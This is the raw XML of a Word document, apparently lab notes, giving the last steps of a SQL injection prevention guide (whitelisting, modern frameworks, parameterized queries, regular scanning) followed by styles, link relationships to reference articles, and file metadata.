              </w:rPr>
              <w:t>Step 3: Use whitelists, not blacklists</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="223F033F" w14:textId="7E579EC5" w:rsidR="000917AA" w:rsidRPr="005B67E9" w:rsidRDefault="000917AA" w:rsidP="005B67E9">
            <w:pPr>
              <w:pStyle w:val="Heading3"/>
              <w:spacing w:before="300" w:beforeAutospacing="0" w:after="225" w:afterAutospacing="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Maax" w:hAnsi="Maax"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Don’t filter user input based on blacklists. A clever attacker will almost always find a way to circumvent your blacklist. If possible, verify and filter user input using strict whitelists only.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000917AA" w14:paraId="4909105E" w14:textId="77777777" w:rsidTr="000917AA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="0" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6178ED18" w14:textId="3ACF54A7" w:rsidR="000917AA" w:rsidRDefault="000917AA">
            <w:bookmarkStart w:id="2" w:name="step4"/>
            <w:bookmarkEnd w:id="2"/>
            <w:r>
              <w:br/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="0" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="772C930C" w14:textId="77777777" w:rsidR="000917AA" w:rsidRDefault="000917AA">
            <w:pPr>
              <w:pStyle w:val="Heading3"/>
              <w:spacing w:before="300" w:beforeAutospacing="0" w:after="225" w:afterAutospacing="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Maax" w:hAnsi="Maax"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Maax" w:hAnsi="Maax"/>
              </w:rPr>
              <w:t>Step 4: Adopt the latest technologies</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="041231B1" w14:textId="77777777" w:rsidR="000917AA" w:rsidRDefault="000917AA">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="225" w:afterAutospacing="0"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Older web development technologies don’t have SQLi protection. Use the latest version of the development environment and language and the latest technologies associated with that environment/language. For example, in PHP use PDO instead of </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>MySQLi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000917AA" w14:paraId="173B7758" w14:textId="77777777" w:rsidTr="000917AA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="0" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7BC5C168" w14:textId="795B4AD0" w:rsidR="000917AA" w:rsidRDefault="000917AA">
            <w:bookmarkStart w:id="3" w:name="step5"/>
            <w:bookmarkEnd w:id="3"/>
            <w:r>
              <w:br/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="0" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C99BC1F" w14:textId="77777777" w:rsidR="000917AA" w:rsidRDefault="000917AA">
            <w:pPr>
              <w:pStyle w:val="Heading3"/>
              <w:spacing w:before="300" w:beforeAutospacing="0" w:after="225" w:afterAutospacing="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Maax" w:hAnsi="Maax"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Maax" w:hAnsi="Maax"/>
              </w:rPr>
              <w:t>Step 5: Employ verified mechanisms</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60D2EF84" w14:textId="77777777" w:rsidR="000917AA" w:rsidRDefault="000917AA">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="225" w:afterAutospacing="0"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>Don’t try to build SQLi protection from scratch. Most modern development technologies can offer you mechanisms to protect against SQLi. Use such mechanisms instead of trying to reinvent the wheel. For example, use parameterized queries or stored procedures.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000917AA" w14:paraId="6C18EFF9" w14:textId="77777777" w:rsidTr="000917AA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="0" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5F5E1D05" w14:textId="3E521136" w:rsidR="000917AA" w:rsidRDefault="000917AA">
            <w:bookmarkStart w:id="4" w:name="step6"/>
            <w:bookmarkEnd w:id="4"/>
            <w:r>
              <w:br/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="0" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="388C2F8B" w14:textId="77777777" w:rsidR="000917AA" w:rsidRDefault="000917AA">
            <w:pPr>
              <w:pStyle w:val="Heading3"/>
              <w:spacing w:before="300" w:beforeAutospacing="0" w:after="225" w:afterAutospacing="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Maax" w:hAnsi="Maax"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Maax" w:hAnsi="Maax"/>
              </w:rPr>
              <w:t xml:space="preserve">Step 6: Scan regularly (with </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Maax" w:hAnsi="Maax"/>
              </w:rPr>
              <w:t>Acunetix</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Maax" w:hAnsi="Maax"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A4D6D8F" w14:textId="77777777" w:rsidR="000917AA" w:rsidRDefault="000917AA">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="225" w:afterAutospacing="0"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">SQL Injections may be introduced by your developers or through external libraries/modules/software. You should regularly scan your web applications using a web vulnerability scanner such as </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Acunetix</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">. If you use Jenkins, you should install the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Acunetix</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> plugin to automatically scan every build.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7508C275" w14:textId="77777777" w:rsidR="00547DCF" w:rsidRDefault="00547DCF">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="225" w:afterAutospacing="0"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="70A13412" w14:textId="77777777" w:rsidR="00B37B2E" w:rsidRDefault="00B37B2E"/>
    <w:sectPr w:rsidR="00B37B2E" w:rsidSect="0021784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Josefin Sans">
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="A00000FF" w:usb1="4000204B" w:usb2="00000000" w:usb3="00000000" w:csb0="00000193" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Muli">
    <w:altName w:val="Cambria"/>
    <w:panose1 w:val="00000000000000000000"/>
    <w:charset w:val="00"/>
    <w:family w:val="roman"/>
    <w:notTrueType/>
    <w:pitch w:val="default"/>
  </w:font>
  <w:font w:name="Maax">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A5E452A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="46243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309592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2781"/>
    <w:rsid w:val="00070BC4"/>
    <w:rsid w:val="000917AA"/>
    <w:rsid w:val="0021784C"/>
    <w:rsid w:val="00231F16"/>
    <w:rsid w:val="00461395"/>
    <w:rsid w:val="005274D2"/>
    <w:rsid w:val="00542909"/>
    <w:rsid w:val="00547DCF"/>
    <w:rsid w:val="005B67E9"/>
    <w:rsid w:val="007716AA"/>
    <w:rsid w:val="00833676"/>
    <w:rsid w:val="008B6805"/>
    <w:rsid w:val="00A45083"/>
    <w:rsid w:val="00A629FA"/>
    <w:rsid w:val="00B37B2E"/>
    <w:rsid w:val="00D0159D"/>
    <w:rsid w:val="00D85595"/>
    <w:rsid w:val="00F12781"/>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A4125B"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{7880F45F-4284-4F70-8923-369438FBED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784C"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00F1278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0917A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F12781"/>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2781"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="36"/>
      <w:sz w:val="48"/>
      <w:szCs w:val="48"/>
      <w:lang w:eastAsia="en-IN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading3Char">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading3"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00F12781"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="0"/>
      <w:sz w:val="27"/>
      <w:szCs w:val="27"/>
      <w:lang w:eastAsia="en-IN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="posted-on">
    <w:name w:val="posted-on"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00F12781"/>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00F12781"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="postby">
    <w:name w:val="post_by"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00F12781"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="author">
    <w:name w:val="author"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00F12781"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00F12781"/>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styleId="Strong">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00F12781"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTMLPreformatted">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HTMLPreformattedChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00F12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rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HTMLPreformattedChar">
    <w:name w:val="HTML Preformatted Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="HTMLPreformatted"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00F12781"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:kern w:val="0"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="en-IN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="000917AA"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTMLCode">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="000917AA"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-operator">
    <w:name w:val="hljs-operator"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="000917AA"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-keyword">
    <w:name w:val="hljs-keyword"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="000917AA"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-string">
    <w:name w:val="hljs-string"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="000917AA"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-number">
    <w:name w:val="hljs-number"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="000917AA"/>
  </w:style>
  <w:style w:type="character" w:styleId="Emphasis">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="000917AA"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-request">
    <w:name w:val="hljs-request"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="000917AA"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-attribute">
    <w:name w:val="hljs-attribute"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="000917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133698">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="2141067156">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="782768926">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="187260896">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="300"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="6" w:space="11" w:color="CFD6D9"/>
            <w:left w:val="single" w:sz="6" w:space="11" w:color="CFD6D9"/>
            <w:bottom w:val="single" w:sz="6" w:space="11" w:color="CFD6D9"/>
            <w:right w:val="single" w:sz="6" w:space="11" w:color="CFD6D9"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="899440895">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="488448183">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="225"/>
          <w:marBottom w:val="225"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="109858425">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="5586354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invicti.com/learn/blind-sql-injection/" TargetMode="Externa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invicti.com/learn/in-band-sql-injection/"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www.acunetix.com/websitesecurity/blind-sql-injection/"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acunetix.com/blog/articles/injection-attacks/" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.hackingarticles.in/setup-web-penetest-lab-beginners-using-dvwa-owasp-mutillidae-ii/" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.invicti.com/learn/sql-injection-sqli/" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.acunetix.com/websitesecurity/sql-injection2/"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18.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hyperlink" Target="https://www.invicti.com/learn/out-of-band-sql-injection-oob-sqli/" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.acunetix.com/blog/articles/exploiting-sql-injection-example/"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TotalTime>
  <Pages>14</Pages>
  <Words>1701</Words>
  <Characters>9696</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11375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BCA Lab 4</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>BCA Lab 4</cp:lastModifiedBy>
  <cp:revision>17</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-09-15T06:22:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-09-15T07:43:00Z</dcterms:modified>
</cp:coreProperties>
</file>